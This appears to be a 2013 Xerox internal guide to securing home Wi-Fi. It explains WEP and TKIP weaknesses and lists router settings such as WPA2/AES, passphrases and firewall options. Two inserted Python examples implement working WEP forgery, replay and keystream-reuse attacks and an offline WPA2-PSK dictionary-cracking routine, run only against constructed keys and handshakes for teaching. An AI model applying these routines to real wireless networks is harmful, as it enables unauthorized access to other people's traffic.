
Configuring your wireless home network: A user's guide
A document of actions, instructions, and guidelines

October 2013
Version 2.0




2013 Xerox Corporation. All rights reserved. Xerox and Xerox and Design are trademarks of Xerox Corporation in the United States and/or other countries. BRXXXXX
Linksys is a registered trademark of Cisco Systems, Inc.
Changes are periodically made to this document. Changes, technical inaccuracies, and
typographic errors will be corrected in subsequent editions.
Document Version: 2.0 (October 2013).
The Xerox Information Security Office (XISO) site may be viewed at:
https://team.thehub.xerox.com/sites/XISO/SitePages/XeroxHome.aspx
XISO can be reached at InfoSec@xerox.com





Xerox Internal Use Only



Table of Contents
1 Overview
Support
Scope
2 WEP Wireless Vulnerabilities and Exploits
Passive wireless attacks
Active Wireless Attacks
Negligence / Misconfiguration
Wired Network Attacks
Specific Wireless Vulnerabilities
No forgery protection
No protection against replays
Reusing initialization vectors
3 TKIP Vulnerabilities and Exploits
4 Security configuration guidelines
Summary checklist
5 Resources





1 Overview
Wireless vulnerabilities are a serious problem for Xerox. Our goal is to reduce
information risk globally by helping you configure your wireless home network
and devices properly, so that an insecurely configured home network does not
become a path to Xerox information and systems when you work from home.

The purpose of this document is to help Xerox employees set up and configure a
secure home wireless network. Before doing so, take some time to become
familiar with the InfoSec 001 Information Security Policy and the Xerox
Information Security Standards (XISS) documents.

The following sections discuss the risks involved with wireless networks and
how to properly configure a home wireless network.
Support
The recommendations in this user's guide are guidelines and may not apply to
every variation of home network. Support for any issue with a home network is
the responsibility of the individual employee; employees with home networks
should not contact Xerox or Xerox Services for support. If a Xerox employee
calls the helpdesk (IT support@Xerox, http://itsupport.xerox.com/index.aspx)
about a wireless issue with their home network, a time and materials charge
will be applied to Xerox by IT support@Xerox.

Scope
This document describes how to configure a home wireless network with specific
security controls that reduce, and in some cases eliminate, the risk of
compromise of the devices that make up the network. Detailed exploits are not
covered or explained in this document.




2 WEP Wireless Vulnerabilities and Exploits
Before you begin configuring your wireless home network, it is important to
understand the threats and risks you are protecting against. There are five
main classes of threats against a wireless network:
Passive wireless attacks
A passive attack gives an intruder access to information exchanged between
communicating end-points: eavesdropping, or theft of the data in transit.
Passive attacks are non-intrusive and usually consist of an unauthorized
person running one of the many Wi-Fi sniffing packages available on the
Internet. This person could be sitting in a parked car across the street from
your home, merely listening to or capturing the Wireless Local Area Network
(WLAN) traffic. Nothing a passive attacker does is visible to you, which is
why the only real defence is strong encryption of the traffic itself.
Active Wireless Attacks
An active attack is one in which an intruder alters, destroys, intercepts or
forcibly interacts with the communication between authorized WLAN devices.
Such attacks include, but are not limited to, network intrusion, data
manipulation, session hijacking, denial of service, bandwidth theft, wireless
spam, and data theft. Active attacks are intentional acts, usually carried out
with malicious intent.
Negligence / Misconfiguration
Negligence need not be intentional. Follow the guidelines and apply the
specific configurations in this document to gain maximum protection. In
particular, a misconfigured wireless router firewall can expose the home
network to exploitation and compromise. Validate the router's firewall
configuration before saving changes.

Wired Network Attacks
All of the traditional network risks are also present in the wireless world.
Once a wireless client has associated, it has a presence on the wire that can
be exploited just like any wired host. Network browsing, port scanning,
operating system flaws and exploits, denial of service attacks, application
flaws and bugs, and incorrect system, application or network access
configurations all remain viable security risks.
Specific Wireless Vulnerabilities
These vulnerabilities depend on the system and are weaknesses against passive
attacks, active attacks, or both. Potential wireless vulnerabilities include:
no real user identification and authentication, weak encryption methods,
denial of service, access point eavesdropping (IP or router), and unauthorized
disclosure and/or modification of data by an unknown third party.
In addition to the classes above, using Wired Equivalent Privacy (WEP) or
Temporal Key Integrity Protocol (TKIP) as a security mechanism is itself a
weakness, as described below and in the next section.
WEP has been thoroughly broken: its design has been under public attack since
2001, and freely available tools recover a WEP key from captured traffic in
minutes. What makes WEP vulnerable? The major WEP flaws fall into three
categories:
No forgery protection

There is no forgery protection provided by WEP. Even without knowing the
encryption key, an adversary can change 802.11 packets in arbitrary,
undetectable ways, deliver data to unauthorized parties, and masquerade as an
authorized user. Even worse, an adversary can also learn more about the
encryption key with forgery attacks than with strictly passive attacks.

No protection against replays

WEP does not offer any protection against replays. An adversary can create
forgeries without changing any data in an existing packet, simply by recording
WEP packets and then retransmitting later. Replay, a special type of forgery
attack, can be used to derive information about the encryption key and the data it
protects.

Reusing initialization vectors
WEP's per-packet key is a 24-bit initialization vector (IV), sent in the clear,
prepended to the shared key. Only about 16.7 million IVs exist, so on a busy
network the same IV, and therefore the same RC4 keystream, is reused within
hours. Two packets encrypted under one IV leak the XOR of their plaintexts,
and one known plaintext exposes the other. This lets an attacker decrypt data
without ever learning the key and without any high-tech technique. While often
dismissed as too slow, a patient attacker can compromise the encryption of an
entire network after only a few hours of data collection, and statistical
attacks on the RC4 key schedule recover the key itself far faster.
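The three WEP flaws above in working code, as an added example that is not part of the Xerox guide: a toy implementation of WEP's frame protection (RC4 keystream from IV || key, CRC-32 integrity check value, 24-bit IV in the clear) with a constructed key and constructed payloads. The frame layout is simplified (no 802.11 header, key-index byte omitted), but the cryptography is WEP's, and the forgery, replay and keystream-reuse steps are exactly what the text describes.

```python
"""Toy WEP: RC4(IV || key) keystream XOR (payload || CRC-32 ICV), IV in clear.

Added example (not from the Xerox guide). Key, IV and payloads are constructed.
Shows: (1) CRC-32 is affine over GF(2), so chosen bits can be flipped and the
ICV fixed up without the key; (2) an unchanged frame replays as valid;
(3) two frames under one IV share a keystream, so one known plaintext exposes
the other.
"""
import zlib


def rc4_keystream(key: bytes, length: int) -> bytes:
    """RC4 key scheduling plus PRGA; returns `length` keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    """Bytewise XOR of two equal-length byte strings."""
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return zlib.crc32(data).to_bytes(4, "little")


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV || RC4(IV || key) XOR (plaintext || ICV)."""
    body = plaintext + icv(plaintext)
    return iv + xor(body, rc4_keystream(iv + key, len(body)))


def wep_decrypt(key: bytes, frame: bytes):
    """Returns the plaintext if the ICV verifies, else None (frame rejected)."""
    iv, ct = frame[:3], frame[3:]
    body = xor(ct, rc4_keystream(iv + key, len(ct)))
    plaintext, tag = body[:-4], body[-4:]
    return plaintext if icv(plaintext) == tag else None


def forge_bit_flip(frame: bytes, delta: bytes) -> bytes:
    """No forgery protection: crc(p ^ d) == crc(p) ^ crc(d) ^ crc(zeros), so the
    encrypted ICV can be patched to match the flipped bits with the key unknown."""
    iv, ct = frame[:3], frame[3:]
    n = len(ct) - 4
    if len(delta) != n:
        raise ValueError("delta must cover the whole payload")
    tag_delta = zlib.crc32(delta) ^ zlib.crc32(bytes(n))
    return iv + xor(ct, delta + tag_delta.to_bytes(4, "little"))


def keystream_from_known_plaintext(frame: bytes, plaintext: bytes) -> bytes:
    """IV reuse: one known plaintext under an IV reveals that IV's keystream."""
    return xor(frame[3:], plaintext + icv(plaintext))


def demo():
    key = bytes.fromhex("0123456789abcdef0123456789")   # constructed 104-bit key
    iv = b"\x01\x02\x03"                                 # the same IV used twice
    p1 = b"GET /status HTTP/1.0\r\n\r\n"                 # constructed payloads
    p2 = b"PUT /upload HTTP/1.0\r\n\r\n"
    f1 = wep_encrypt(key, iv, p1)
    f2 = wep_encrypt(key, iv, p2)

    # (1) forgery: turn "/status" into "/secret" without the key; the AP accepts it
    forged = forge_bit_flip(f1, xor(p1, b"GET /secret HTTP/1.0\r\n\r\n"))
    accepted_forgery = wep_decrypt(key, forged)
    # (2) replay: the recorded frame, resent unchanged, still verifies
    accepted_replay = wep_decrypt(key, f1)
    # (3) IV reuse: keystream learned from f1/p1 strips f2 without the key
    ks = keystream_from_known_plaintext(f1, p1)
    p2_recovered = xor(f2[3:], ks)[:-4]
    return accepted_forgery, accepted_replay, p2_recovered


if __name__ == "__main__":
    print(demo())
```

The forgery works because CRC-32 is an affine function of the message bits, so the change in the check value depends only on which bits were flipped, not on the plaintext or the key. A keyed MIC such as CCMP's AES-based one has no such property, which is what selecting WPA2 with AES in section 4 buys you.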




3 TKIP Vulnerabilities and Exploits
What makes TKIP vulnerable? TKIP was designed as a firmware upgrade for WEP
hardware, so it keeps the same underlying RC4 mechanism and adds per-packet
key mixing, a sequence counter and the weak Michael message integrity check.
It is consequently vulnerable to a number of related attacks. The major TKIP
flaws can be exploited through several attack vectors, including man-in-the-
middle (MITM) attacks, ARP poisoning and denial of service. In particular,
TKIP is subject to message falsification: an attacker can recover the
keystream and the Michael key for a short packet (such as an ARP packet) and
forge packets of that size. The first published form of this attack took
around fifteen minutes; a refinement that uses a MITM position to reduce the
execution time completes in about one minute. If your equipment supports only
WPA with TKIP, treat it as you would WEP and replace it.



4 Security configuration guidelines
This section walks you through the steps required to configure your wireless
home network with the proper security controls. The screen shots provided are
based on a Cisco Linksys wireless router and are meant for illustration only,
not as an endorsement of the vendor or product. Interfaces and configuration
instructions vary from product to product; refer to the router manufacturer's
or vendor's documentation for actual setup and configuration.

1. Change the default administration password on the router/access point.
Default passwords are published for every model, so anyone who reaches the
management interface can otherwise log in.
2. Change the administration interface from HTTP to HTTPS, so that the
administration password is not sent in the clear over your own network.
3. Disable remote management. Remote management allows the wireless
configuration to be changed from a remote location (outside your home
network); enabling it exposes the management login, and any flaw in it, to
the whole Internet, which can lead to compromise or denial of service. Most
manufacturers have remote management disabled by default; verify this rather
than assuming it.




4. Take the following in-home sources of interference into account:
a. Cordless phones on the same frequency
b. Another wireless network nearby
c. Microwaves
d. House construction: walls, floors, wiring
e. Location of objects within the house; metal will block or bounce the
signals.

These can cause interference. If you experience connection drops on the WLAN,
change the default "Wireless Channel". It is also recommended to limit the
number of users who can access the router by limiting the number of IPs in
the DHCP pool and scope; note that this only limits accidental sharing, since
anyone who can join the network can assign themselves a static address.



5. Enable WPA2 and AES encryption. WPA2 encrypts with AES in CCMP mode using
a 128-bit key; there is no stronger AES setting to choose on a WPA2 router,
so simply select "WPA2" with "AES" (sometimes labelled CCMP). Do not select
TKIP, and avoid a WPA/WPA2 "mixed" mode, which lets clients fall back to the
TKIP weaknesses described in section 3. In addition, make sure the wireless
client software is updated regularly so that the latest features of the
access point/router are supported.
6. Enable WPA2-PSK. Choose a long passphrase (8 to 63 characters) that is not
a dictionary word, a name or a phrase found in common wordlists: the
passphrase is the only secret in WPA2-PSK, and anyone who records a client
joining your network can test guesses against that recording offline. Ensure
that the group key renewal is set to the default or 600 seconds. If your
router does not support WPA2-PSK, it is strongly recommended to procure a new
wireless router / firewall product that supports WPA2 with AES encryption.



[Screenshot: a WPA2 AES-enabled home wireless network (Linksys) shown beside an arbitrary wireless network that is not enabled with WPA2 AES.]
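How WPA2-PSK turns the passphrase into keys, and what that means for steps 5 and 6, as an added example in Python that is not from the Xerox guide. It derives the Pairwise Master Key and Pairwise Transient Key the way the standard specifies and then plays the attacker's side against a constructed handshake: the MAC addresses, nonces, EAPOL-Key body, passphrase and wordlist are all made-up values, but the derivation is the one real clients, access points and cracking tools use.

```python
"""What a WPA2-PSK passphrase protects, and why its strength matters.

Added example (not from the Xerox guide). WPA2-Personal derives the 256-bit
Pairwise Master Key (PMK) from the passphrase with PBKDF2-HMAC-SHA1
(4096 rounds, SSID as salt). The 4-way handshake derives the Pairwise
Transient Key (PTK) from the PMK, both MAC addresses and two nonces, and
proves possession with an HMAC-SHA1 MIC over the EAPOL-Key frame. Everything
except the passphrase travels in the clear, so a captured handshake can be
tested against guesses offline. MACs, nonces, EAPOL body, passphrase and
wordlist below are constructed values.
"""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11 PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """CCMP PTK (48 bytes): KCK (16) || KEK (16) || TK (16)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 key MIC: HMAC-SHA1 over the EAPOL-Key frame (MIC field zeroed), 16 bytes."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def crack_psk(wordlist, ssid, aa, spa, anonce, snonce, eapol, captured_mic):
    """Offline dictionary attack on one captured handshake: each guess costs one
    PBKDF2 run plus a few HMACs, and nothing is ever sent to the network."""
    for guess in wordlist:
        kck = derive_ptk(pmk_from_passphrase(guess, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol), captured_mic):
            return guess
    return None


def demo():
    ssid = "HomeNet"                                   # constructed SSID
    aa = bytes.fromhex("001122334455")                 # AP (authenticator) MAC
    spa = bytes.fromhex("66778899aabb")                # client (supplicant) MAC
    anonce = hashlib.sha256(b"anonce").digest()        # stand-ins for random 32-byte nonces
    snonce = hashlib.sha256(b"snonce").digest()
    # EAPOL-Key message 2: version 2, type 3, length 95, descriptor 2, key info
    # 0x010a (MIC|Pairwise|HMAC-SHA1 version), MIC field zeroed as the receiver
    # does before verifying. Constructed layout, not a capture.
    eapol = (bytes.fromhex("0203005f02010a0000") + b"\x00" * 8   # header, desc, info, len, replay ctr
             + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # nonce, key IV, RSC, key ID
             + b"\x00" * 16 + b"\x00\x00")                         # MIC (zeroed), key data length

    passphrase = "cordless-microwave-walls-2013"                  # the secret under test
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    captured_mic = eapol_mic(kck, eapol)      # what an attacker reads from message 2

    wordlist = ["password", "linksys", "HomeNet2013", passphrase]  # constructed wordlist
    return crack_psk(wordlist, ssid, aa, spa, anonce, snonce, eapol, captured_mic)


if __name__ == "__main__":
    print(demo())
```

Two consequences for steps 5 and 6 follow directly from the code: because the SSID is the PBKDF2 salt, leaving a default SSID such as the vendor name lets an attacker reuse tables precomputed for that SSID, so change the SSID as well; and because each guess costs a single PBKDF2 run, a short or dictionary passphrase falls to an offline attack in minutes regardless of how the router is otherwise configured.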




7. Enable the router's firewall, including stateful packet inspection (SPI)
and "Filter Internet NAT Redirection" (the Linksys name for the setting that
stops hosts on the LAN from reaching local servers through the router's public
address).
8. Wireless router location matters. Keep the router away from windows and
exterior walls so that less of your signal radiates outside your home.
Placement reduces how easily the network is seen; it is not a substitute for
the encryption settings above.

9. Review the vendor's site periodically for firmware updates, and apply
them. Flaws in the router's own firmware are not fixed by anything else on
this list.


Summary checklist
The table below provides a summary checklist that should be used to ensure you
have completed all of the recommended steps to secure your wireless home
network.

Wireless Configuration Step
1 Default administrator's password has been changed
2 Access server has been changed to HTTPS
3 Remote management has been disabled
4 The default IP address to access the router configuration has been changed
5 The number of IPs that can gain wireless access has been limited by DHCP scope
6 AES encryption and WPA2-PSK authentication has been enabled
7 MAC filtering has been enabled
8 SPI firewall has been enabled

Items 4, 5 and 7 make the network harder to use by accident, not harder to
attack: client MAC addresses and the router's address are visible in clear
text to anyone within range, and are trivially spoofed or set by hand. Item 6,
together with a strong passphrase, is the control that actually protects your
traffic.


5 Resources
Wireless Security for Home Networks

http://www.sensible-computer-help.com/wireless-network-security.html


InfoSec 001 Information Security Policy

This policy governs the protection of Xerox Information in any form, including
verbal, electronic or hard copy, and in any media. It also applies to Xerox
Information at any location, including in an employee's home, and stored or
transmitted by any equipment or device, including equipment or storage media
owned by another company or owned personally by an employee. In addition,
this policy governs information protection measures required for Xerox
Information that is originated, processed, transmitted, or stored in electronic form.
It establishes rules for the use of protective measures and identifies the
responsibilities of managers and employees of Xerox and Xerox Business
Partners in protecting Xerox Information that exists in electronic form.

Xerox Information Security Standards (XISS)

The Xerox Information Security Standards set forth in that document are
designed to support the Electronic Information System Security Policy, which
establishes the rules for protective measures and identifies responsibilities
for protecting information that exists in electronic form.
